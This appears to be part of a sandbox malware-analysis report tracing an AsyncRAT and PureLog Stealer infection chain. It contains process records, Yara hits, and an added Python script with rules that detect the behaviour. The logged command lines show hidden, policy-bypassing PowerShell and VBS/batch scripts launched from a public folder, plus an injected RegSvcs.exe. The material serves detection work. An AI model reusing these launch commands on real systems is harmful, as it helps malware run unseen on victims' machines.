                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            Target ID:22
                                            Start time:16:35:10
                                            Start date:14/03/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Imagebase:0xa70000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4626854201.0000000005247000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4523483443.0000000001029000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4646402691.00000000066FB000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4523483443.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4647656889.000000000673B000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4626854201.0000000005230000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4646275028.00000000066F7000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:false

                                            Target ID:24
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:25
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\net.exe" session
                                            Imagebase:0x7ff7ed130000
                                            File size:59'904 bytes
                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:26
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:27
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net1.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\net1 session
                                            Imagebase:0x7ff7d7450000
                                            File size:183'808 bytes
                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:28
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
                                            Imagebase:0x7ff638f60000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:29
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:30
                                            Start time:16:35:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Has exited:true

                                            Target ID:31
                                            Start time:16:35:52
                                            Start date:14/03/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Imagebase:0x7a0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001F.00000002.2808356805.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true

                                            Target ID:32
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:33
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\net.exe" session
                                            Imagebase:0x7ff7ed130000
                                            File size:59'904 bytes
                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:34
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:35
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net1.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\net1 session
                                            Imagebase:0x7ff7d7450000
                                            File size:183'808 bytes
                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:36
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
                                            Imagebase:0x7ff638f60000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:37
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:38
                                            Start time:16:37:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Has exited:true

                                            Target ID:39
                                            Start time:16:37:53
                                            Start date:14/03/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Imagebase:0xd40000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000027.00000002.4004352545.000000000300F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000027.00000002.3995210664.0000000001249000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                            Has exited:true
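The process records above document the delivery chain end to end: wscript.exe runs a .vbs from C:\Users\Public, `net.exe session` is executed (a common batch-file probe for elevation, since it fails with access denied for a non-admin), cmd.exe runs the dropped .bat, PowerShell is started with `-WindowStyle Hidden -ExecutionPolicy Bypass` on a script in C:\Users\Public, and RegSvcs.exe, a .NET framework utility that legitimately always receives an assembly path, is started with no arguments and then carries AsyncRAT Yara hits in memory. Note also the Yara "Source" names: the first field is the target ID in hex (0000001E is process 30, 0000001F is 31, 00000026 is 38, 00000027 is 39) and the fourth is the base address of the dumped region, which the "Source File ... Offset" lines further down confirm. The following Python is an added example, not Joe Sandbox code: it parses a constructed subset of these records copied from the report, decodes the dump names, and applies three detection rules to the result. It assumes that the fifth dump-name field is the region's page protection (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE), which fits the data but is not stated by the report, and it treats `net session` as a privilege probe, which is an interpretation.

```python
"""Parse Joe Sandbox process records and flag the AsyncRAT delivery chain.
Added example (not Joe Sandbox code).  RECORDS is a constructed subset of the
report's own process list, trimmed to the fields the rules need."""
import re
from dataclasses import dataclass, field

# Constructed input: three records from the report, fields copied verbatim.
RECORDS = r"""
Target ID:30
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Target ID:31
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Target ID:33
Path:C:\Windows\System32\net.exe
Commandline:"C:\Windows\System32\net.exe" session
"""

YARA_RE = re.compile(r"Rule: (?P<rule>[^,]+), .*Source: (?P<src>\S+\.sdmp)")
# Dump name layout: <pid hex>.<snapshot>.<dump id>.<base address>.<protection>...
# PID and base address are confirmed by the report; the protection field is assumed.
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<snap>[0-9A-F]{8})\.\d+\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<prot>[0-9A-F]{8})\.", re.I)
PAGE_EXECUTE_READWRITE = 0x40  # Windows memory protection constant


@dataclass
class Proc:
    target_id: int
    path: str
    cmdline: str
    yara: list = field(default_factory=list)  # (rule, pid, base, protection)


def parse_records(text):
    """Split the blank-line separated records into Proc objects."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields, yara = {}, []
        for line in block.splitlines():
            if line.startswith("•"):  # one Yara match per bullet
                m = YARA_RE.search(line)
                d = SDMP_RE.match(m.group("src"))
                yara.append((m.group("rule").strip(), int(d["pid"], 16),
                             int(d["base"], 16), int(d["prot"], 16)))
            else:
                key, _, value = line.partition(":")
                fields[key.strip()] = value.strip()
        procs.append(Proc(int(fields["Target ID"]), fields["Path"],
                          fields.get("Commandline", ""), yara))
    return procs


def findings(procs):
    """Return (target_id, tag) pairs for the behaviours seen in this report."""
    out = []
    for p in procs:
        exe = p.path.rsplit("\\", 1)[-1].lower()
        cmd = p.cmdline.lower()
        # Rule 1: hidden, policy-bypassing PowerShell running a script from a
        # world-writable staging folder.
        if (exe == "powershell.exe" and "-executionpolicy bypass" in cmd
                and "-windowstyle hidden" in cmd and "\\users\\public\\" in cmd):
            out.append((p.target_id, "hidden_bypass_powershell_from_public"))
        # Rule 2: RegSvcs.exe launched with no arguments (legitimate use always
        # names an assembly) and a Yara hit on an RWX region: injected payload.
        if exe == "regsvcs.exe" and cmd.strip('"') == p.path.lower():
            if any(prot == PAGE_EXECUTE_READWRITE for _, _, _, prot in p.yara):
                out.append((p.target_id, "injected_code_in_regsvcs"))
        # Rule 3: 'net session' used as an elevation probe (interpretation).
        if exe == "net.exe" and cmd.endswith(" session"):
            out.append((p.target_id, "net_session_privilege_probe"))
        # Sanity check: every dump's PID field must equal the record's target ID.
        for rule, pid, _, _ in p.yara:
            if pid != p.target_id:
                out.append((p.target_id, f"yara_pid_mismatch:{rule}"))
    return out


if __name__ == "__main__":
    for target_id, tag in findings(parse_records(RECORDS)):
        print(f"target {target_id}: {tag}")
```

The RWX check in rule 2 is what separates a hollowed RegSvcs.exe from a benign one: a manually mapped PE lands at the unpacked image base (0x402000 here, the .text section of a 32-bit image based at 0x400000) in privately allocated read-write-execute memory, whereas the loader maps a legitimate image from a file with PAGE_EXECUTE_READ.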


                                              Execution Graph

                                              Execution Coverage:3.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:5
                                              Total number of Limit Nodes:1
                                              Execution graph (rendering omitted): 5 nodes rooted at 7ffd348ae1d0; the only resolved API call is IUnknown_QueryInterface_Proxy at 7ffd348ae181.

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Control-flow graph of the function at 7ffd348ac568 (rendering omitted; the node and edge listing is not reproduced). Internal calls resolved in the graph: 7ffd348a75c0, 7ffd348a66e0, 7ffd348a7700, 7ffd348a76f0, 7ffd348ad15e.
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ef394f36532d70af53920a6eb21866526a794a376fda2173e00f8b7c7955d5f
                                              • Instruction ID: dc5029c882069e21af20f32198f9d2eabd4566ec948c9e99ac041e8bec84564b
                                              • Opcode Fuzzy Hash: 6ef394f36532d70af53920a6eb21866526a794a376fda2173e00f8b7c7955d5f
                                              • Instruction Fuzzy Hash: 6972C331B19A0D8FEB94EB68C4A56B973E2FF59305F1401BDD44ED3292DE78A842CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Control-flow graph of the function at 7ffd348a91f6 (rendering omitted; the node and edge listing is not reproduced). The function makes numerous internal calls into the 7ffd348a5a88 to 7ffd348aa0af range of the same JIT region.
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bae797817806e5ddbf83e5f2e9f53b7da1551e1df3895fca0758429bf98d74c4
                                              • Instruction ID: 1f0bfa729a0e2b490574f4fbbfcdc89316767903dac59e2dd05f51c7993d1f94
                                              • Opcode Fuzzy Hash: bae797817806e5ddbf83e5f2e9f53b7da1551e1df3895fca0758429bf98d74c4
                                              • Instruction Fuzzy Hash: C1826330B1DA498FEB94EB18C8A57A973E1FF59300F1445B9D50EC7292CE79AC42DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 724090e5fe83be020fb20cdb94a4dc0d262740ee853d9db81fe772e35f0ae78c
                                              • Instruction ID: 944dc27409e75a39a30bbaad8038e8514deffdb4bbcb501a3af2ddb961423103
                                              • Opcode Fuzzy Hash: 724090e5fe83be020fb20cdb94a4dc0d262740ee853d9db81fe772e35f0ae78c
                                              • Instruction Fuzzy Hash: F7512B32F0DA494FEBA9DB6C94A52B97BE0EF56314F04057FD14DC3182DEAC68068791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID: Interface_ProxyQueryUnknown_
                                              • String ID:
                                              • API String ID: 2522245112-0
                                              • Opcode ID: 22d3f5e948b7a3962439f4acc4cb30465e544568a89bdb5a1e44eb20c044d3b9
                                              • Instruction ID: facc1e4fc3f7c71c6692e007886a2be20fe25b2fcd0c9034060ec479d32b5c38
                                              • Opcode Fuzzy Hash: 22d3f5e948b7a3962439f4acc4cb30465e544568a89bdb5a1e44eb20c044d3b9
                                              • Instruction Fuzzy Hash: 2931393091DB884FD725AB6C9C5A5B67FF4EF57321F04017FE089C3152DA646446C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2248417915.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd34970000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af29e6bef4b82ca843feddf62706b1fc900885ac0bc9d5479b8ebe51dbd0dfb6
                                              • Instruction ID: 9f09743077b3b59203d151a6af889292c390835dab60012a36f63979607502ee
                                              • Opcode Fuzzy Hash: af29e6bef4b82ca843feddf62706b1fc900885ac0bc9d5479b8ebe51dbd0dfb6
                                              • Instruction Fuzzy Hash: 3EE01A30A18F064BE674ABB8542A6D676D0BB05330F140768E0BED32D6DA38A8428780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2247494556.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M_^
                                              • API String ID: 0-3807191693
                                              • Opcode ID: 0cea559471f8dd9102125b1fbeb9c259724fcac1db9de14fcab4fc84a484a372
                                              Execution Graph

                                              Execution Coverage:10.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:59
                                              Total number of Limit Nodes:4

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef0c08210532bf4efa82e6866de0bccca17b683a04794d3ba09233659a99c71c
                                              • Instruction ID: d5663728dcea7eb88f901e92237de5e29d504ce4c864008e42b26b8efd47be81
                                              • Opcode Fuzzy Hash: ef0c08210532bf4efa82e6866de0bccca17b683a04794d3ba09233659a99c71c
                                              • Instruction Fuzzy Hash: C243D531C10B5A8ADB11EF68C8945A9F7B1FF99300F11D79AE45877221EB70AAD4CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bf675db6c33fcb7f2cce78b4c97c5d1b2bc1719650fe06d9ea1491728743e72
                                              • Instruction ID: 3db0253540e20cb08526ff373d1b1fab9dd4fe7badc02a2d159016ceb28f5081
                                              • Opcode Fuzzy Hash: 6bf675db6c33fcb7f2cce78b4c97c5d1b2bc1719650fe06d9ea1491728743e72
                                              • Instruction Fuzzy Hash: 3713E971D10B1A8ADB11EF68C854599F7B1FF99300F11D79AE4487B221EB70AAC5CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 78009a35c3c3f73bad215ed61b0a64bb5f48a804219101714cbb604d4df91734
                                              • Instruction ID: 27bb87627d19e709c89684c05163d4c0382961baf092d5822f3574589bd41031
                                              • Opcode Fuzzy Hash: 78009a35c3c3f73bad215ed61b0a64bb5f48a804219101714cbb604d4df91734
